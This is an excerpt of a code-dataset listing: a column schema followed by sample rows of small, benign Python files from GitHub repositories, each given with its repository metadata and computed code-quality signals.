| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
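The example rows below follow this schema. As a minimal sketch of how such rows might be screened on their quality-signal columns, assuming they are stored in a Parquet file (the file name here is hypothetical; the column names are verbatim from the schema above, and the thresholds are illustrative only):

```python
# Minimal sketch: load rows with the schema above and filter on two
# quality signals. "code_sample.parquet" is a hypothetical file name.
import pandas as pd

df = pd.read_parquet("code_sample.parquet")

# Keep files with little duplicated 5-gram mass and a healthy share of
# alphabetic characters; both cutoffs are illustrative, not official.
clean = df[
    (df["qsc_code_frac_chars_dupe_5grams_quality_signal"] < 0.5)
    & (df["qsc_code_frac_chars_alphabet_quality_signal"] > 0.5)
]
print(f"{len(clean)} of {len(df)} rows pass")
```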
---

**hexsha:** `254d3022845aae3d1a9293a0181f060be7c09b6f` | **size:** 28 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `pyqt/utils/__init__.py` | `TaoYang526/qt` | `81ed776c67f2df0d07d8b7e964e6a25b9271b28b` | ["Apache-2.0"] | null | null | null |
| max_issues | `pyqt/utils/__init__.py` | `TaoYang526/qt` | `81ed776c67f2df0d07d8b7e964e6a25b9271b28b` | ["Apache-2.0"] | null | null | null |
| max_forks | `pyqt/utils/__init__.py` | `TaoYang526/qt` | `81ed776c67f2df0d07d8b7e964e6a25b9271b28b` | ["Apache-2.0"] | null | null | null |

**content:**

```python
from pyqt.utils import time
```

**stats:** avg_line_length 14 | max_line_length 27 | alphanum_fraction 0.821429

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
5 | 28 | 4.6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
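The three stats above can be reproduced from this record's content alone. A minimal sketch, assuming the stored file carries a trailing newline (27 visible characters plus `\n`, matching size 28) and that the fractions are computed over all 28 bytes; the pipeline's exact definitions are not given here:

```python
# Reproduce record 1's stats from its 28-byte content (assumed form).
content = "from pyqt.utils import time\n"

size = len(content)                                  # 28 bytes
lines = content.split("\n")                          # ["from ... time", ""]
avg_line_length = size / len(lines)                  # 28 / 2 = 14.0
max_line_length = max(len(line) for line in lines)   # 27
alphanum_fraction = sum(c.isalnum() for c in content) / size  # 23/28 = 0.821429

print(avg_line_length, max_line_length, alphanum_fraction)
```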
---

**hexsha:** `c276e6f457a794f0b9dc50d4ef823c9392fe5335` | **size:** 62 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `src/lk_db/ents/time/EntTime.py` | `nuuuwan/lk_db` | `ac0abfa47ba31b0d4c2c8566b3101b83749bd45d` | ["MIT"] | null | null | null |
| max_issues | `src/lk_db/ents/time/EntTime.py` | `nuuuwan/lk_db` | `ac0abfa47ba31b0d4c2c8566b3101b83749bd45d` | ["MIT"] | null | null | null |
| max_forks | `src/lk_db/ents/time/EntTime.py` | `nuuuwan/lk_db` | `ac0abfa47ba31b0d4c2c8566b3101b83749bd45d` | ["MIT"] | null | null | null |

**content:**

```python
from lk_db.ents.Ent import Ent
class EntTime(Ent):
pass
```

**stats:** avg_line_length 10.333333 | max_line_length 30 | alphanum_fraction 0.709677

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
11 | 62 | 3.909091 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.209677 | 62 | 5 | 31 | 12.4 | 0.877551 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c2ad28eb7943b8ab5d743641a4bd509bff412fa2` | **size:** 4,807 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `evalml/preprocessing/data_splitters/balanced_classification_splitter.py` | `skvorekn/evalml` | `2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8` | ["BSD-3-Clause"] | null | null | null |
| max_issues | `evalml/preprocessing/data_splitters/balanced_classification_splitter.py` | `skvorekn/evalml` | `2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8` | ["BSD-3-Clause"] | null | null | null |
| max_forks | `evalml/preprocessing/data_splitters/balanced_classification_splitter.py` | `skvorekn/evalml` | `2cbfa344ec3fdc0fb0f4a0f1093811135b9b97d8` | ["BSD-3-Clause"] | null | null | null |

**content:**

```python
from sklearn.model_selection import StratifiedKFold
from evalml.preprocessing.data_splitters.balanced_classification_sampler import (
BalancedClassificationSampler
)
from evalml.preprocessing.data_splitters.base_splitters import (
BaseUnderSamplingSplitter
)
from evalml.preprocessing.data_splitters.training_validation_split import (
TrainingValidationSplit
)
class BalancedClassificationDataTVSplit(BaseUnderSamplingSplitter):
"""Data splitter for generating training and validation split using Balanced Classification Data Sampler."""
def __init__(self, balanced_ratio=4, min_samples=100, min_percentage=0.1, test_size=0.25, shuffle=True, random_seed=0):
"""Create Balanced Classification Data TV splitter
Arguments:
balanced_ratio (float): The largest majority:minority ratio that is accepted as 'balanced'. For instance, a 4:1 ratio would be
represented as 4, while a 6:5 ratio is 1.2. Must be greater than or equal to 1 (or 1:1). Defaults to 4.
min_samples (int): The minimum number of samples that we must have for any class, pre or post sampling. If a class must be downsampled, it will not be downsampled past this value.
To determine severe imbalance, the minority class must occur less often than this and must have a class ratio below min_percentage.
Must be greater than 0. Defaults to 100.
min_percentage (float): The minimum percentage of the minimum class to total dataset that we tolerate, as long as it is above min_samples.
If min_percentage and min_samples are not met, treat this as severely imbalanced, and we will not resample the data.
Must be between 0 and 0.5, inclusive. Defaults to 0.1.
test_size (float): The size of the test split. Defaults to 0.25.
shuffle (bool): Whether or not to shuffle the data before splitting. Defaults to True.
random_seed (int): The seed to use for random sampling. Defaults to 0.
"""
self.sampler = BalancedClassificationSampler(balanced_ratio=balanced_ratio, min_samples=min_samples, min_percentage=min_percentage, random_seed=random_seed)
super().__init__(sampler=self.sampler, n_splits=1, random_seed=random_seed)
self.shuffle = shuffle
self.test_size = test_size
self.balanced_ratio = balanced_ratio
self.min_samples = min_samples
self.min_percentage = min_percentage
self.splitter = TrainingValidationSplit(test_size=test_size, shuffle=shuffle, random_seed=random_seed)
class BalancedClassificationDataCVSplit(BaseUnderSamplingSplitter):
"""Data splitter for generating k-fold cross-validation split using Balanced Classification Data Sampler."""
def __init__(self, balanced_ratio=4, min_samples=100, min_percentage=0.1, n_splits=3, shuffle=True, random_seed=0):
"""Create Balanced Classification Data CV splitter
Arguments:
balanced_ratio (float): The largest majority:minority ratio that is accepted as 'balanced'. For instance, a 4:1 ratio would be
represented as 4, while a 6:5 ratio is 1.2. Must be greater than or equal to 1 (or 1:1). Defaults to 4.
min_samples (int): The minimum number of samples that we must have for any class, pre or post sampling. If a class must be downsampled, it will not be downsampled past this value.
To determine severe imbalance, the minority class must occur less often than this and must have a class ratio below min_percentage.
Must be greater than 0. Defaults to 100.
min_percentage (float): The minimum percentage of the minimum class to total dataset that we tolerate, as long as it is above min_samples.
If min_percentage and min_samples are not met, treat this as severely imbalanced, and we will not resample the data.
Must be between 0 and 0.5, inclusive. Defaults to 0.1.
n_splits (int): The number of splits to use for cross validation. Defaults to 3.
shuffle (bool): Whether or not to shuffle the data before splitting. Defaults to True.
random_seed (int): The seed to use for random sampling. Defaults to 0.
"""
self.sampler = BalancedClassificationSampler(balanced_ratio=balanced_ratio, min_samples=min_samples, min_percentage=min_percentage, random_seed=random_seed)
super().__init__(sampler=self.sampler, n_splits=n_splits, random_seed=random_seed)
self.shuffle = shuffle
self.balanced_ratio = balanced_ratio
self.min_samples = min_samples
self.min_percentage = min_percentage
self.splitter = StratifiedKFold(n_splits=n_splits, shuffle=shuffle, random_state=random_seed)
```

**stats:** avg_line_length 60.848101 | max_line_length 191 | alphanum_fraction 0.725817

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
669 | 4,807 | 5.068759 | 0.188341 | 0.047184 | 0.023002 | 0.02949 | 0.824536 | 0.763197 | 0.763197 | 0.763197 | 0.739605 | 0.707756 | 0 | 0.017246 | 0.215935 | 4,807 | 78 | 192 | 61.628205 | 0.882462 | 0.564801 | 0 | 0.344828 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068966 | false | 0 | 0.137931 | 0 | 0.275862 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c2bc8e02528d8ad4917cf1b72be4033e672be9ac` | **size:** 31 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `model/mscff/__init__.py` | `LK-Peng/CNN-based-Cloud-Detection-Methods` | `1393a6886e62f1ed5a612d57c5a725c763a6b2cc` | ["MIT"] | 2 | 2022-02-16T03:30:19.000Z | 2022-03-18T08:02:39.000Z |
| max_issues | `model/mscff/__init__.py` | `LK-Peng/CNN-based-Cloud-Detection-Methods` | `1393a6886e62f1ed5a612d57c5a725c763a6b2cc` | ["MIT"] | null | null | null |
| max_forks | `model/mscff/__init__.py` | `LK-Peng/CNN-based-Cloud-Detection-Methods` | `1393a6886e62f1ed5a612d57c5a725c763a6b2cc` | ["MIT"] | 1 | 2022-02-16T03:30:20.000Z | 2022-02-16T03:30:20.000Z |

**content:**

```python
from .mscff_model import MSCFF
```

**stats:** avg_line_length 15.5 | max_line_length 30 | alphanum_fraction 0.83871

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
5 | 31 | 5 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129032 | 31 | 1 | 31 | 31 | 0.925926 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `c2bd7d19cb0b1997605bb2bf0b20e39d01a29860` | **size:** 96 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `netensorflow/ann/macro_layer/layer_structure/__init__.py` | `psigelo/NeTensorflow` | `ec8bc09cc98346484d1b682a3dfd25c68c4ded61` | ["MIT"] | null | null | null |
| max_issues | `netensorflow/ann/macro_layer/layer_structure/__init__.py` | `psigelo/NeTensorflow` | `ec8bc09cc98346484d1b682a3dfd25c68c4ded61` | ["MIT"] | null | null | null |
| max_forks | `netensorflow/ann/macro_layer/layer_structure/__init__.py` | `psigelo/NeTensorflow` | `ec8bc09cc98346484d1b682a3dfd25c68c4ded61` | ["MIT"] | null | null | null |

**content:**

```python
from .InputLayerStructure import InputLayerStructure
from .LayerStructure import LayerStructure
```

**stats:** avg_line_length 32 | max_line_length 52 | alphanum_fraction 0.895833

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
8 | 96 | 10.75 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 96 | 2 | 53 | 48 | 0.977273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `6c3ba5d9b3babe444d2c4d3c2e6c46f0cd91ef11` | **size:** 27 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py` | `fsrlab/FSR_ROS_SIM` | `f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62` | ["MIT"] | null | null | null |
| max_issues | `ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py` | `fsrlab/FSR_ROS_SIM` | `f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62` | ["MIT"] | null | null | null |
| max_forks | `ep_ws/devel/lib/python3/dist-packages/realsense2_camera/srv/__init__.py` | `fsrlab/FSR_ROS_SIM` | `f22dfbd19ca1f2f1c7456fc51fb382509f9d7c62` | ["MIT"] | null | null | null |

**content:**

```python
from ._DeviceInfo import *
```

**stats:** avg_line_length 13.5 | max_line_length 26 | alphanum_fraction 0.777778

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
3 | 27 | 6.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148148 | 27 | 1 | 27 | 27 | 0.869565 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `6c63b62274efc319d7d5ff5ab63d36ad70596229` | **size:** 240 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `stacks/tests/test_decode_string.py` | `ahcode0919/python-ds-algorithms` | `0d617b78c50b6c18da40d9fa101438749bfc82e1` | ["MIT"] | null | null | null |
| max_issues | `stacks/tests/test_decode_string.py` | `ahcode0919/python-ds-algorithms` | `0d617b78c50b6c18da40d9fa101438749bfc82e1` | ["MIT"] | null | null | null |
| max_forks | `stacks/tests/test_decode_string.py` | `ahcode0919/python-ds-algorithms` | `0d617b78c50b6c18da40d9fa101438749bfc82e1` | ["MIT"] | 3 | 2020-10-07T20:24:45.000Z | 2020-12-16T04:53:19.000Z |

**content:**

```python
from stacks.decode_string import decode_string
def test_decode_string():
assert decode_string("3[a]2[bc]") == "aaabcbc"
assert decode_string("3[a2[c]]") == "accaccacc"
assert decode_string("2[abc]3[cd]ef") == "abcabccdcdcdef"
```

**stats:** avg_line_length 30 | max_line_length 61 | alphanum_fraction 0.7

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
35 | 240 | 4.6 | 0.571429 | 0.447205 | 0.335404 | 0.236025 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028846 | 0.133333 | 240 | 7 | 62 | 34.285714 | 0.745192 | 0 | 0 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0.6 | 1 | 0.2 | true | 0 | 0.2 | 0 | 0.4 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `66849fe8ffb1c558532c4307c57805110b8abc4c` | **size:** 134 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `app/config/task.py` | `atulmishra-one/dairy_management_portal` | `a07320dc0f4419d4c78f7d2453c63b1c9544aba8` | ["MIT"] | 2 | 2020-08-02T10:06:19.000Z | 2022-03-29T06:10:57.000Z |
| max_issues | `app/config/task.py` | `atulmishra-one/dairy_management_portal` | `a07320dc0f4419d4c78f7d2453c63b1c9544aba8` | ["MIT"] | null | null | null |
| max_forks | `app/config/task.py` | `atulmishra-one/dairy_management_portal` | `a07320dc0f4419d4c78f7d2453c63b1c9544aba8` | ["MIT"] | 2 | 2019-02-03T15:44:02.000Z | 2021-03-09T07:30:28.000Z |

**content:**

```python
CELERY_BROKER_URL = 'redis://localhost:6379/0'
CELERY_RESULT_BACKEND = 'redis://localhost:6379/0'
CELERY_IMPORTS=('app.users.tasks')
```

**stats:** avg_line_length 26.8 | max_line_length 50 | alphanum_fraction 0.768657

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
19 | 134 | 5.157895 | 0.684211 | 0.285714 | 0.367347 | 0.387755 | 0.510204 | 0 | 0 | 0 | 0 | 0 | 0 | 0.079365 | 0.059701 | 134 | 5 | 51 | 26.8 | 0.698413 | 0 | 0 | 0 | 0 | 0 | 0.466667 | 0.355556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `66a65924a1e2768d7469c1f8356205da9b3cbe9a` | **size:** 89 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `project/healthcheck.py` | `permallotment/allotment3` | `0eb390086cc8f48ba6817541c6c70c06dfc83058` | ["CC0-1.0"] | null | null | null |
| max_issues | `project/healthcheck.py` | `permallotment/allotment3` | `0eb390086cc8f48ba6817541c6c70c06dfc83058` | ["CC0-1.0"] | null | null | null |
| max_forks | `project/healthcheck.py` | `permallotment/allotment3` | `0eb390086cc8f48ba6817541c6c70c06dfc83058` | ["CC0-1.0"] | null | null | null |

**content:**

```python
from django.http import HttpResponse
def health(request):
return HttpResponse("OK")
```

**stats:** avg_line_length 17.8 | max_line_length 36 | alphanum_fraction 0.764045

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
11 | 89 | 6.181818 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.146067 | 89 | 4 | 37 | 22.25 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0.022472 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `dd07924629dd0724abf147fb5de6f38d430e1d51` | **size:** 136 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `ui/widgets/histogram/__init__.py` | `berendkleinhaneveld/Registrationshop` | `0d6f3ee5324865cdcb419369139f37c39dfe9a1c` | ["MIT"] | 25 | 2015-11-08T16:36:54.000Z | 2022-01-20T16:03:28.000Z |
| max_issues | `ui/widgets/histogram/__init__.py` | `berendkleinhaneveld/Registrationshop` | `0d6f3ee5324865cdcb419369139f37c39dfe9a1c` | ["MIT"] | 2 | 2016-12-01T23:13:08.000Z | 2017-07-25T02:40:49.000Z |
| max_forks | `ui/widgets/histogram/__init__.py` | `berendkleinhaneveld/Registrationshop` | `0d6f3ee5324865cdcb419369139f37c39dfe9a1c` | ["MIT"] | 10 | 2016-07-05T14:39:16.000Z | 2022-01-01T02:05:55.000Z |

**content:**

```python
from Histogram import Histogram
from HistogramWidget import HistogramWidget
from TrackingHistogramWidget import TrackingHistogramWidget
```

**stats:** avg_line_length 34 | max_line_length 59 | alphanum_fraction 0.911765

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
12 | 136 | 10.333333 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088235 | 136 | 3 | 60 | 45.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0

**signal flags** (unsuffixed `qsc_*` columns, in schema order):
1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0

**effective:** 0 | **hits:** 6
---

**hexsha:** `dd19eb06c6b535902edc1e166510cf7dc3e3ac06` | **size:** 425 | **ext:** py | **lang:** Python

| | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
|---|---|---|---|---|---|---|---|
| max_stars | `src/aequitas/plot/__init__.py` | `antoinelb/aequitas` | `5a912a3c1751b04c8688ad9e0c09ed87a6c48870` | ["MIT"] | 469 | 2018-04-24T23:11:45.000Z | 2022-03-29T07:54:07.000Z |
| max_issues | `src/aequitas/plot/__init__.py` | `antoinelb/aequitas` | `5a912a3c1751b04c8688ad9e0c09ed87a6c48870` | ["MIT"] | 62 | 2018-04-16T00:14:56.000Z | 2021-11-12T10:35:01.000Z |
| max_forks | `src/aequitas/plot/__init__.py` | `antoinelb/aequitas` | `5a912a3c1751b04c8688ad9e0c09ed87a6c48870` | ["MIT"] | 94 | 2018-05-21T16:13:57.000Z | 2022-03-25T20:07:25.000Z |

**content:**

```python
from aequitas.plot.summary_chart import plot_summary_chart as summary
from aequitas.plot.bubble_disparity_chart import plot_disparity_bubble_chart as disparity
from aequitas.plot.bubble_metric_chart import plot_metric_bubble_chart as absolute
from aequitas.plot.bubble_concatenation_chart import plot_concatenated_bubble_charts as disparity_absolute
from aequitas.plot.xy_metrics_chart import plot_xy_metrics_chart as scatter
```

**stats:** avg_line_length 85 | max_line_length 106 | alphanum_fraction 0.908235

**quality signals** (`qsc_*_quality_signal` columns, in schema order):
